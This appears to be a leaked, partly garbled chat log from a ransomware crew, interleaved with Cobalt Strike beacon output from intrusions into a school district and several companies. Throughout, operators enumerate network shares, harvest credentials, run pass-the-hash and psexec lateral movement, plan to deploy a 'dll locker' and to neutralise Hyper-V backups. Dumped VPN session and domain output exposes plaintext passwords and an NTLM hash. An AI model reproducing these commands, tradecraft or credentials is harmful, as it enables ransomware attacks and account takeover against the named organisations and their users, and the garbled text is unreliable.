engrade Disk
Import_Services Disk
SMDIM Disk
VT_Integration Disk
The command completed successfully.


beacon> shell net view \10.51.200.121\
[*] Tasked beacon to run: net view \10.51.200.121\
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

``They're only available.
beacon> shell net view \10.0.61.61\
[*] Tasked beacon to run: net view \10.0.61.61\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \10.0.61.61\



Share name Type Used as Comment

-------------------------------------------------------------------------------
Scann Disk
The command completed successfully.

``but without /all look + did you look through net view /all?
beacon> shell dir \\10.0.61.61\E$
[*] Tasked beacon to run: dir \\10.0.61.61\E$
[+] host called home, sent: 50 bytes
[+] received output:
The network name cannot be found.
``[ ](https://mediaeveryone.com/group/sisd-net?msg=m6zxd8WsviWgkxFQs) can you see the dir? no, we pull what's pulling C only? no[ ](https://mediaeveryone.com/group/sisd-net?msg=mLKXLRCzPvYxMwx9c) besides the other mappings?
Status Local Remote Network

-------------------------------------------------------------------------------
OK Q:        \10.210.0.51\C$ Microsoft Windows Network
OK R:        \10.210.0.42\C$ Microsoft Windows Network
OK S:        \10.210.0.42C$ Microsoft Windows Network
OK T:        \10.210.0.62$ Microsoft Windows Network
OK U:        \10.210.0.41.41\C$ Microsoft Windows Network
OK V:        \10.210.0.61\C$ Microsoft Windows Network
OK W:        \10.0.51.84$ Microsoft Windows Network
OK X:        \10.0.53.24\C$ Microsoft Windows Network
OK Y:        \10.210.0.52$ Microsoft Windows Network
OK Z:        \10.0.61.69\N$ Microsoft Windows Network

The drive is a letter, i.e. net use A: \host\c$$$ do you map it to letters?[ ](https://mediaeveryone.com/group/sisd-net?msg=JTcdnWK4Mt9pQTh4C) this one has disks - yes ``
beacon> shell net use *\\\10.0.61.61\C$
[*] Tasked beacon to run: net use *\\\10.0.61.61\C$
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.
```
```
Shared resources at \\10.0.61.61\



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C$ Disk Default share
E$ Disk Default share
G$ Disk Default share
I$ Disk Default share
IPC$ IPC Remote IPC
M$ Disk Default share
P$ Disk Default share
Q$ Disk Default share
R$ Disk Default share
Scann Disk
T$ Disk Default share
The command completed successfully.
``ad_computers.txt:7592: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:7641: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:7690: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:826378: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:1560647: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
I see that these are attracted?
and which are not attracted it seems to be part of the cluster - there is simply replicated data, check.... and this is attracted?
HyperV-Dell01.admin.sisd.k12
``consistently.''
[*] Listing: \\10.0.61.69\N$\shared\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 03/09/2015 09:03:16 $RECYCLE.BIN
          dir 11/17/2017 08:39:57 amh
          dir 01/16/2020 14:13:59 BPA
          dir 01/16/2019 16:49:23:23 BPA Teacher
          dir 11/14/2019 13:03:31 CTE
          dir 03/09/2015 09:05:42:42 ech
          dir 10/15/2019 12:54:42 ED9
          dir 04/03/2017 14:12:52:52 edh
          dir 09/09/2015 09:02:26 ELH
          dir 03/09/2015 09:12:02:02 files
          dir 11/19/2019 09:28:51 GoVenture
          dir 03/28/2016 14:48:04 key
          dir 03/09/2015 09:15:51 moh
          dir 03/09/2015 09:16:05 most2003
          dir 03/09/2015 09:16:31 oph
          dir 03/09/2015 09:16:35 PM PharmExam
          dir 09/09/2015 09:24:12 PM Profile
          dir 04/06/2017 10:44:18 PM software
          dir 09/09/2016 09:28:04 soh
          dir 03/09/2015 10:55:17 PM System Volume Information
          dir 03/09/2015 10:55:17 vBusiness

``and shared
[*] Listing: \\10.0.61.69\N$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 05/05/2020 14:45:23 $RECYCLE.BIN
          dir 12/10/2018 09:34:11 Backup Agents for Cluster Groups
          dir 02/19/2019 08:08:46 Program Files
          dir 01/16/2019 16:34:55 shared
          dir 12/07/2020 19:04:06:06 System Volume Information
``[ ](https://mediaeveryone.com/group/sisd-net?msg=kPsFe4JH3LQiz9mxS) give me a listing of this directory N$$ do not see disks they are not attracted, no ball
```
Av-CNS-HyperV: 10.0.53.210
Av-HyperV-Dell1: 10.0.53.250
Av-HyperV-FX2-1: 10.0.53.193
Av-T-HyperV: 10.0.53.238
``I poked at the randome what if yes - all the folders inside the N$ are contained all the folders that are ``next to it``?
beacon> portscan 10.0.61.69 445,135,139
[*] Tasked beacon to scan ports 445,135,139 on 10.0.61.69
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.0.61.69' is alive. [read 8 bytes]
10.0.61.69:139
10.0.61.69:135
10.0.61.69:445 (platform: 500 version: 10.0 name: NAS2 domain: ADM)
``no need for that
there are almost no handhelds on workstations, cobalt can't handle 1k sessions[ ](https://mediaeveryone.com/group/sisd-net?msg=uvhfe2qF95gvoH6Wr) already wrote it down[ ](https://mediaeveryone.com/group/sisd-net?msg=c6Hi5Lq5CY6yQcjtZ) so what? @user8 please give me access to cobalt privately where you have a session with the YES token
beacon> shell net view \\10.0.61.69 /all
[*] Tasked beacon to run: net view \\10.0.61.69 /all
[+] host called home, sent: 57 bytes
[+] received output:
Shared resources at \10.0.61.69



Share name Type Used as Comment

-------------------------------------------------------------------------------
amh Disk
BPA Disk
CTE Disk
ech Disk
ED9 Disk
EDH Disk
ELH Disk
files Disk
GoVenture Disk
IPC$ IPC Remote IPC
KEY Disk
MOH Disk
most2003 Disk
N$ Disk Z: Cluster Default Share
OPH Disk
PharmExam Disk
Profile Disk
shared Disk
software Disk
SOH Disk
vbusiness Disk
The command completed successfully.



Shell net view \10.0.61.69 /all right, that's what I mean)) like a variant without a drop to disk
beacon> shell wmic /node:10.0.61.69 os get name
[*] Tasked beacon to run: wmic /node:10.0.61.69 os get name
[+] host called home, sent: 64 bytes
[+] received output:
Name

Microsoft Windows Server 2016 Standard|C:\Windows|\Device\Harddisk0\Partition2

``To bypass the avne spread
and inject the dll locker into the current biconay process, as I understood that the new script will spread the build across all the sessions open in the coba. So maybe it's better to pull the armas into the coba and not mount them? or the nix server? and you're sure it's the windup at all?
Shares for 10.0.61.69:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		amh BPA CTE ech ED9 EDH ELH files GoVenture KEY MOH most2003 N$ OPH PharmExam Profile shared software SOH vbusiness
******* COMPLETE *******

``or wmica net view?
beacon> shell wmic /node:10.0.61.69 logicaldisk get description,name
[*] Tasked beacon to run: wmic /node:10.0.61.69 logicaldisk get description,name
[+] host called home, sent: 85 bytes
[+] received output:
Description Name

Local Fixed Disk C:

Local Fixed Disk F:

Local Fixed Disk N:
```
```
beacon> shell net use * \\10.0.61.69\C$
[*] Tasked beacon to run: net use *\\\10.0.61.69\C$
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

```
:thinking:Is this what we have? Example
`execute-assembly /home/user/TOOLS/SharpSharesNG.exe shares DMZ-HyperV````
        /*
         * SharpSharesNG <ips|shares> --max-threads 10 --output console|/path/to/file
         *
         * ips - equiv ips ad
         * ips 10.0.0.1 [--os-detect] [--alive]
         * ips 10.0.0.1/24 [--os-detect] [--alive]
         * ips HostName [--os-detect] [--alive]
         * ips [ad] [--os-detect] [--alive]
         * ips [list] c:\users\hostlist.txt [--os-detect] [--alive]
         *
         *
         * shares - equiv shares ad
         * shares 10.0.0.1 [--os-detect] [--public-only]
         * shares 10.0.0.1/24 [--os-detect] [--public-only]
         * shares HostName [--os-detect] [--public-only]
         * shares [ad] [--os-detect] [--public-only]
         * shares [list] c:\users\hostlist.txt [--os-detect] [--public-only]
So you'll have about 2k matched armas and then let's map the armas to 10 per server. Now the goal is to map the rest of the servers, all their network drives and leave them untouched except for the dk and dns servers.
SISD-SQL: 10.0.61.70 -
SISD-SQLFC: 10.0.61.73 -
NAS: 10.0.61.80 -
HYPERV-DELL01: 10.0.53.240 -
HyperV-FX2-01: 10.0.53.199 - -
CNS-HyperV: 10.0.53.200 - -
ESPAPP1: 10.0.53.52 - -
SCHOOLBO: 10.0.254.4 - -
ESPTSK3: 10.0.53.58 - -
ADM-CCRP: 10.0.254.3 -
```
all network drives on the current servers are mapped the rest of the servers are mapped. now do this, it's like this: 222 of 277 servers are mapped? how many servers in total are mapped? where no session is mapped? if pipe, nothing is mapped if regular dll`` ``.
Shares for CAUSQLCL8wx:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ClusterStorage$
******* COMPLETE *******

``Where ??? there either
```
The network name cannot be found.
```
or
```
The network path was not found.
```
it gives out after a while, the change of codes didn't help ``pipe netjump no`` ``
- MY-SISD-NFS: 10.0.61.61 ?
- VIDEO-SOH: 10.13.200.122 ProcessId = 19316; ReturnValue = 0;
- VDI-PVS: 10.210.0.40 ProcessId = 8176; ReturnValue = 0;
- STU-HOME: 10.0.61.57 ?
- T-HYPERV: 10.0.53.230 ???
- SESROEVIDEOSVR: 10.116.200.121 ???
- RIERHM-VIDEOSVR: 10.58.200.121 ???
- SQLCLUSTER: 10.0.53.25 ???
- VDI-PVS01-2: 10.210.0.51 ProcessId = 9912; ReturnValue = 0;
- STU-SERVER: 10.0.50.1 ???
- VDI-PVS02-1: 10.210.0.42 ProcessId = 6424; ReturnValue = 0;
- VDI-XD02: 10.210.0.62 ProcessId = 8956; ReturnValue = 0;
- VDI-PVS01-1: 10.210.0.41 ProcessId = 12324; ReturnValue = 0;
- VDI-XD01: 10.210.0.61 ProcessId = 7988; ReturnValue = 0;
- NPM-01: 10.0.51.84 ProcessId = 16948; ReturnValue = 0;
- CAUSQLCL8wx: 10.0.53.24 ProcessId = 9300; ReturnValue = 0;
- VDI-PVS02-2: 10.210.0.52 ProcessId = 1764; ReturnValue = 0;
- VDI-PVS02: 10.51.200.121 ?
- TylerSISCluster: 10.0.53.26 ???
- CATE-NAS: 10.0.61.69 ???
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
Shares for Av-DMZ-HyperV:
	[--- Unreadable Shares ---]
		IPC$


``````
VERSASQL: 10.0.53.98`
`` Arrived under other creeds[ ](https://mediaeveryone.com/group/sisd-net?msg=DcRLKdoj2X7BEKciC) no, from another server under other creeds - everything is the same now I will try another one... by the way as far as I see there is a lot about hypervi... these servers hold images - if you don't deal with them, the grid is likely to recover in one click is out of my 55 not attracted? is it out of 200?
```
EDHF-SPED: 10.0.61.226
STU-YEARBOOK: 10.0.50.222
ADM-TECH1: 10.0.51.104
Av-CNS-HyperV: 10.0.53.210
CAUSQLCL8wx: 10.0.53.23
Av-HyperV-Dell1: 10.0.53.250
Av-HyperV-FX2-1: 10.0.53.193
Av-T-HyperV: 10.0.53.238
Retired-VMs: 10.0.51.97
WAC: 10.0.61.75
check if another host is pinging this ipac which may be a cluster storage which will have the same ipi as the "normal" serverwhat is the overall progress? ok check from another point he does not even have admin$ change the server and accesses you have looked from one server sharina how is it[ ](https://mediaeveryone.com/group/sisd-net?msg=H2ocT3ZYwuoCEAst7) try from another point no sessions arrived, the delta is loaded what to do? if the server only ``t
Shares for DMZ-HyperV:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ClusterStorage$

``````
FINIIS1: 10.0.53.109 000
ESPTSK2: 10.0.53.57 000
RPTNET1: 10.0.53.60 000
ESPAPP4: 10.0.53.55 000
ADM-LASON: 10.0.51.63 000
VERSASQL: 10.0.53.98 000
ENSOR-HORIZON: 10.206.56.121 000 000
ADM-CARDACCESS: 10.0.51.61 000
ADM-XPEDITER: 10.0.51.45 000
ESPSQL1: 10.0.53.51 000
ESPAPP2: 10.0.53.53 000
CMP-TCH-51-60: 10.0.51.60 000
ADM-KMS: 10.0.61.87 000
ESPTSK1: 10.0.53.56 000
 
``when jampeon is sometimes more effective, not only psexec_psh
but also a regular psexech is pretty solid
where it doesn't start - you can try it with pipes
+ SISD-SQL01: 10.0.61.71
+ VDI-PROFILES: 10.0.61.20
+ T-HYPERV01: 10.0.53.231
+ HYPERV36: 10.0.53.247
+ SISD-SQL02: 10.0.61.72
+ EDHSVIDEO: 10.206.16.121
+ CTE-STORE01: 10.221.1.31
+ HYPERV22: 10.0.53.202
+ MONITOR: 10.0.51.78
+ BSE1-VIDEOSVR: 10.118.200.121
+ NOC-MASTER: 10.210.224.29
+ DWEVIDEOSVR: 10.120.200.121
+ DHCP01: 10.0.51.4
+ AHS-VIDEO: 10.11.200.121
+ VDI-SF01: 10.210.0.63
+ SCVMM: 10.0.254.69
+ HYPERV35: 10.0.53.246
+ DHCP02: 10.0.51.7
+ HYPERV34: 10.0.53.245
+ RIGHTFAX: 10.0.51.82
+ CTE-SQL01: 10.221.1.121
+ NOC-EX7: 10.210.224.74
+ HYPERV33: 10.0.53.244
+ HYPERV21: 10.0.53.201
+ HYPERV31: 10.0.53.242
+ HYPERV32: 10.0.53.243
+ HYPERV23: 10.0.53.203
+ HYPERV24: 10.0.53.204
+ CNS-HYPERV02: 10.0.53.212
+ T-HYPERV03: 10.0.53.233
+ T-HYPERV04: 10.0.53.234
+ HYPERV25: 10.0.53.205
+ VDI-SQL-01: 10.210.0.1
+ MMSVIDEOSVR: 10.52.200.121
+ JCEVIDEOSVR: 10.130.200.121
- MY-SISD-NFS: 10.0.61.61
- VIDEO-SOH: 10.13.200.122
- VDI-PVS: 10.210.0.40
- STU-HOME: 10.0.61.57
- T-HYPERV: 10.0.53.230
- SESROEVIDEOSVR: 10.116.200.121
- RIERHM-VIDEOSVR: 10.58.200.121
- SQLCLUSTER: 10.0.53.25
- VDI-PVS01-2: 10.210.0.51
- STU-SERVER: 10.0.50.1
- VDI-PVS02-1: 10.210.0.42
- VDI-XD02: 10.210.0.62
- VDI-PVS01-1: 10.210.0.41
- VDI-XD01: 10.210.0.61
- NPM-01: 10.0.51.84
- CAUSQLCL8wx: 10.0.53.24
- VDI-PVS02-2: 10.210.0.52
- CLARKE-SVE: 10.51.200.121
- TylerSISCluster: 10.0.53.26
- CATE-NAS: 10.0.61.69
``The servers do not overlap? yes see these two puffingThe second river is flowing185....113 the first is mine and the user7 and what is the second coba? we are each 55 pieces and in 2 cobas work out the first 200? there is one coba empty50/55 I have about 50% what is the overall progress? and the second?
[+] Looking for RADIUS domain creds
[+] Found radius domains, parsing
[!] Found radius domain creds
[+] aDfoj344*#l2eh2@192.168.188.64

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'PNGC-ACCTRDS-01 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-01.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'PNGC-ACCTRDS-01 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-01.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 25, 'name': 'PNGC-RDS-01 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-RDS-01.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 25, 'name': 'PNGC-RDS-01 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-RDS-01.pngc.com'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTSQL-01 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.96'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTRDS-01 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.97'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTSQL-02 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.129'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTRDS-02 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.128'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 44, 'name': 'PNGC-ACCTRDS-02 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-02.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 44, 'name': 'PNGC-ACCTRDS-02 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-02.pngc.com'}
``````
[+] Checking URL https://205.236.0.43
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.9-26sv

[+] Leaking sessions to dump configuration.
[+] Attempting to dump sessions from https://205.236.0.43
      [+] Found: SessionID: 1Ao1qakSkqZUQ1Yg1r1V8Z0n7l7l7axQdQUQAH4HgrtHQ= userType: 1 userName: abarter Password: warrenwitches Domain: pngcdomain
      [+] Found: SessionID: O1DgDOf7kN2aFj18o7YPpz4hRCEUQj16ekh8Z18qBFE= userType: 1 userName: ajackson Password: tessakitty0625 Domain: pngcdomain
      [+] Found: SessionID: UkvbkafqdnyTOwAHibeL3GQY4Uy31VVdg8h0jqldA1g= userType: 1 userName: mdonovan Password: FUH@ck3rs! Domain: pngcdomain
      [+] Found: SessionID: b1CAsgAi6GwDG5Ab6yC9Z0Xj9cbl5axwogMpNoWpu24= userType: 1 userName: tstubblefield Password: LordofLords2 Domain: pngcdomain
[+] Done with https://205.236.0.43, found 4 sessions
These?
leeandmason.com L&M Domain 107.0.14.250 tl 127kk STOPPED 2fa need hot sessions

``````
pngc.com pngcdomain 205.236.0.43 user4 238kk STOPPED no valid accounts

``The first one is actually a town of some kind. Why them? Can I have these rewritten, please?
madison.il.us gisnet1 71.14.246.203
redwoodcity.org redwoodcity.org 76.14.0.148
canalbarge.com canalbarge 50.233.57.77

``I've got about an hour and a half here for sure, I've got about 30 minutes to start thinking,`` I've got 2fa somewhere if you need it,`` no luck yet? the tech guys should study in any case, for access to echi or other virtualization, and generally juicy data in the form of backup regulations, network maps and the like9 of 10 what will there mfat will hit in the carbon cloud
well it's technareid browsers is a bit of a wanker, i understand, but speaking of carbon, there are cases where the execution of any psch code in the network for example carbon by policies is perceived as an alert and sends a note to the admins Find the creed from carbon= )
well then let's start with the "task", what's the priority right now?
i think the study of the machines of technicians, it's probably the usual no-jouz, copying files, psekzek_command is quite a realistic solutionSo why "go" on the net? you have segments that you can not see? i do not quite understand how to go on the net Look at it as a useful practice "silent" work
otherwise there is no way = (the better the less tascas/randall/unsigned egos and the like then alas, carbone writes any anomalies, not only smallwar but also not just "out-of-the-box" invectives
it's a cloud SOC[ ](https://mediaeveryone.com/group/evo-com?msg=dTHei4MCgBJfC5NpX) I think not@tl1 have we started a dll here at all? if not - you can try psch pailoadych for protection functionscarbon even though EDR has a greater focus on whitelisting and account controlif you are ready today to urgently hack work on this network - I do not see the criminal in spreading dllTo see processes do not watch remotelyIt is everywhere that you should not even try to slug the dll?nptywtf `SUDIGYFSDO^F&W67rfuSYRG^U67HGH `so you do not have dns and ldap anything in the domain + you do it from the dedicates?) give your hell, I have it removed in zeroinds better not touch, there is most likely a detector on ntsyutilad better reset, I clearly obsolete server without cb.exe in processes, there will be a chance to jump into the network there is a carbon` EVO\radmin 3v0r3port`
sure it's valid``.
Get list of DCs in domain 'evo.local' from '\\AZ-DC-2.evo.local'.
     CHEECH.evo.local [DS] Site: HQ2
    AZ-DC-2.evo.local [PDC] [DS] Site: evoAZURE
    HQ-DC-2.evo.local [DS] Site: HQ2
    HQ-DC-1.evo.local [DS] Site: HQ2
    AZ-DC-4.evo.local [DS] Site: evoAZURE

========================================================================

[*] EVO\Administrator
[*] EVO\Administrator Tmpl
[*] EVO\bduong
[*] EVO\bkruse
[*] EVO\bplehal
[*] EVO\bpratt
[*] EVO\cbbackup
[*] EVO\ceaton
[*] EVO\dhcpreg
[*] EVO\evoadmin
[*] EVO\hdryden
[*] EVO\iso Reset123
[*] EVO\isoutsource
[*] EVO\jcourtney May12011
[*] EVO\landerson
[*] EVO\lsoto
[*] EVO/MerakiVPNSrv
[*] EVO\mgentry
[*] EVO\nkiger L1m3_Gr33n
[*] EVO\qlyons
[*] EVO\radmin 3v0r3port
[*] EVO\sborn
[*] EVO\SBS Backup User
[*] EVO\searle
[*] EVO\ServerAdmin$
[*] EVO\spiceworks
[*] EVO\svc_mechanic
[*] EVO\SVC_PRTG
[*] EVO\svc_sqlmnt
[*] EVO\svc_sqlslave
[*] EVO\tadmin evo123 - disabled
[*] EVO\tfield
[*] EVO\tmusselwhite Guide12319
[*] EVO\ups
[*] EVO\veeam_vss
[*] EVO\vipreadmin
[*] EVO\vpnadmin

========================================================================

[*] Found users in enterprise admins
[*] \Administrator
[*] \iso
[*] \isoutsource
[*] \jtizon
[*] \manuelw
[*] \MerakiVPNSrv
[*] \nkiger
[*] \qlyons
[*] \sborn
[*] \ServerAdmin$
[*] \vipreadmin

========================================================================

scanuser abc123$ - VALID FOR DC

C:{Windows\system32> net localgroup "administrators"
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Administrator
EVO\Domain Admins
Roscoe
The command completed successfully.
``To minimize pvshya specially for you built a huge c# tulkitdotnet does not hinder AMSI and does not watch as pvshocheen please stop using verashell as much as possible where you can make do with dotnetblin, yeah.... I mean SharpView, not PowerView.
stop
what invoke? I've already written about both vpc and vpshshehe we'll find the logs from Misha, we started with him today it seems to output all in a row,just invoke-uchuchuchtuchtuchtuchtuchtuchtuchtucht if the user is not set, then it looks like something searches forhis error kicks out how so? sharpview does not search? do not look (sharpview know how to find the users too? super! Yes, you have a Sharpe sniper?hence it should "be able" to read them because it accesses domain controllers logsand you have to run it only from domain admin contexttry sharpsniperit's a good time to test it)we were looking for something like this, i think we found it on veraschel, search for keywords like network, admin, tech, etc. and allocate them from ad_users and use this tool to find their pc where will be valuable information about the network, just the same should be information about edr, backups, etc. in the problem "search for technicians "actually helps find nts assigned to users, gave you this stuff?```
https://github.com/HunnicCyber/SharpSniper
this is how you check if the current credentials are rolling on the remote pkvs make yourself a token lA for the supposed machine
second - respectively from kmd through >shell@tl2 prompted you)or wmic /node:10.225.10.200 process briefs \\10.225.10.200\c$test the easiest way to check access to the file system1) will not be better - because similarly dirty load will be generatedGood friends, please.
We now and in the future will be very often confronted with WPNs. I remember them as a whole + - by heart on the config and everything else, but in order to make it more convenient for everyone - please make a separate thread on the forum, where will lie installers VPN, guidance on finding config files vpnov on different operating systems, and other related to this type of access to the same
```
jump psexec64 10.225.10.200 https
```
pre-generates a dirty binary that could trick even a regular winndef, such attempts are almost guaranteed to create a securiti event-how to check here?) I think you already know what to check this way:
```
jump psexec64 10.225.10.200 https
```
wrong, because this token might not get access at runtime by itself, use primitive tokens, which only fail if access is wrong, or use make_token ```.
pth datacenter.local\adm.brodan0 06290576382001cd1da4c942e9fa0ca6
``I'll repeat the last time[ ](https://mediaeveryone.com/channel/general?msg=yHwrHWhtKpBocnuAK) let's get the passwords out of the vannott and move on to the eighth[ ](https://mediaeveryone.com/channel/general?msg=K4jfy6RjSGBrCRC2E) 2[ ](https://mediaeveryone.com/channel/general?msg=vgKtrJmq4LPeLYNQh) 1 or where is it from? they also have YES?) typo ninth) chetu.comdom.helpathome.com + found the "silent" servers?
dom.helpathome.com - @user9 and @user1
saiglobal.com - @user8
@user4 finish his (check.on.com), then joins saiglobal.comfiredi.com@user8 domain? he'll do it@tl1 passni saig @user8 then me and @user1 finish mywas 6 people - 3 grids) he's a priority too and finish them both to myself in dom.helpathome.com)[ ](https://mediaeveryone.com/channel/general?msg=cMScshjiqrspPvE3W) but @user8 says no sessions to him, which one of you is lying? it's for the future, when you make a listener for a pass you specify it + 443 port there domain saw beacons at https?):wink:where does it go where?When you do `spawn misha`pass - pass it to the domain? by the way + and notice that there and the ip is different and not the one you connect to the right do you see? open and look at your https nobody even looked at their listener in the coba) you asked the coba where the sessions passwhat domain?[ ](https://mediaeveryone.com/channel/general?msg=iPcyxH5o42hFED4T2) that's the coba's ip, and I need a domain, different domains see different trusts from 19 still enough of the colleagues above) there are two of them, right? what trusts are there?.161.126.162 gotovkobu where to pass the session or work from those that remained from there need to do, the other trusts + hell + av + backups then allocate 1 person on saiglobal.com all at the dekat all without a case now? dekat rebooted00 write plz how many trusts in domains domains.helpathome.comhappay.inn so please tell me what networks are up and running now?[ ](https://mediaeveryone.com/channel/general?msg=HrfgL9vcyE6NR2MMX) .[ ](https://mediaeveryone.com/channel/general?msg=kZc6hgGxJF65QRDgg) .@user8 where are you going? yes-all the groups? sec)+@tl1Add me to them herehare.add me to the confines of Stalinymm, and 1 that did not fly there not everything is so simple3 in the process until you can fall on the first 2 to the others, the third is still waiting? still a session has arrived possible) or have not yet connected) but it seems to have disconnected from the domain (yes, I work with her now - my yesterday red do not touch it + 1 + that Dc-01 and this session is one grid?strange thingd1 came) yesterday's sessions or yesterday's? either pass each other in the cob sessions or give access to a partner, there as conveniently as possible take one for two are expected 3 pcsIn both eyes:flushed:okomonitor yesterday's cobFriver.local
two sessions - very hovering-sessions live any?so good:sleeping:good morning)Good afternoon:space_invader:Cheerful morning)Quiet b\quiet night thank you all for todayThe important thing is that the mistakes are passed and the result is thereMolodyodtsy and took two DAD to tomorrows vps and dedikaminakosyali)until today to tomorrowtoday on the total time is already very much let's finishtakahe good option to look for svoith and check on the lpe we have in the network services, we check them in the case in situations to sort out theoretical up to search for the name of the dog admin as a password) well, and if it did not pass?)) poured in the archive, which was in the requirements for the reportitsituation is theoretical)ftp sploitvoprosy
almost all of us today do not have polzaki la
no credits (nowhere at all)
go up does not work
logically need to scan the network, look for 7/xp/sql and so on - and sploat them
let's say the kerb is still unhackable
keyloggers, fakelogons....
Inway
I might have missed something, but that's pretty much it.
what else interesting things can be done in such a situation? so, all poured files with hell and other things? yes, i checked on 4 phones at home - does not work on any of them tomorrow by 15 who do not know vpinp.net
```
User is not LA
creeds from browsers
AD info
Checked the non-ABA test domain
Got the LA\DA\EA lists
sitifno
ran the dll
Checked files on the machine that contain passwords.
Checked ad_computers for passwords.
trying to raise permissions (2020-076)
mimikatz value::creds
session crashed
``We've got a cart that's not working.helpathome.com
```
The user is not LA
browsers creds
AD info
Checked the non-AB\test domain
Got the LA\DA\EA lists
sitifno
ran the dll
Checked files on the machine that contain passwords.
Checked ad_computers for passwords.
trying to raise permissions (2020-076)
Share-Finder (process died)
GPPP-Pass
Invoke_Kerberoast
mimikatz value::creds
Ping machines in the domain
Portscan to standard ports
session crashed

session is back
kerb hash reset - started to check for validity
checked user - yes, password has not changed for a long time
tried to check validity via net use - got syntax error
session crashed
``@user7 didn't you get a session? collected information from the machine adinf, sylbelt, sharpweb, rubeus kerb, invok kerb, tried no gpp (found nothing)
ran through the folders.
went from ad coputers to windows 2003 and HP.
pinged them and made a list
Alexei connected and on one of the vin 2003 machines he brought up the system
with the YES Credentials filled in the dll and started it up.
took hashes from the dc
started to complete the list of servers, decided to make life easier lehka script and fakal doc over which sat all this time as got hell infogroups were, the current user does not enter them anyone had such a situation with LA as I described? that there is no direct reference to the current user, but there are other groups?
Received session:
	UserName: forstern (not a local admin)
	HostName: SHO-LT-4726W10
	Domain: bnpmedia.com

Got it:
	AdFind
	DCs
	DA
	EA
	LA (SHO-LT-4726W10)
	SeatBelt
	WinPeas
	Kerb-hash (Rubeus)
	1 password from browser (SharpWeb) by MSOutLook

It didn't work:
	CVE-2020-0796 - session in system context did not spawn, no error
	Net-GPPPasswords.exe - it parried, it did not give me any credits
	Invoke-Kerberoast.ps1 - gave an error that there were no users for kerberoast
	smb_login - ran MSOutLook password on the current subnet, no machine
			came up
	SharpChrome - didn't give out any credits

Did not have time:
	MS_17_010 - Built OS: Windows XP, 7, Server 2003, 2008, had time to ping not all, planned to run ms_17_010_psexec on successfully pinged.

Also sorted the servers into groups.

OpenVPN and ScreenConnector configurations were found on the computer.
OpenVPN could not be deployed on the harddisk.
``````
*CHETU.COM
unchecked AD info
removed net accounts /dom net group "domain admins" /dom net group "enterprise admins" /dom
stripped the invoke-kerberos and gave them to the brute force
SeatBelt + winPEAS
CharpChrome - pulled out 10 passwords that fit the length of the domain requirements.
Raise the privileges did not work, in spite of the not updated Windows
From ad_computers I checked out the server computers and added pings to the list.
Found a backup file OneNote passwords.one (On 8-27-2020).one on the system.
Prepared a list of interesting files on the FS (unattend and office docks)`` just the first line in the message with the "report" name conf confi to know where there is a situation write more immediately on what grid plizharrau.in
```
1) Take off the browser Credits Chrome and then all the rest
2) Take off AD_Users
3) take off YES
4) removed local
5) Remove mimic
6) Collected password files
7) Half-dawned the 2020-0796 system
8) Started looking at the network for further movement
9) Sorting data
10) Preparing reports

The connection is lost.

```
friver.local
```
Helping User7

1) Checked subnets
2) Chose a subnet, checked on ms17 found one car, threw the session in the armitage
3) Took down hashdam and mimic.
4) Found YES.
5) Got a dump from DS.

```
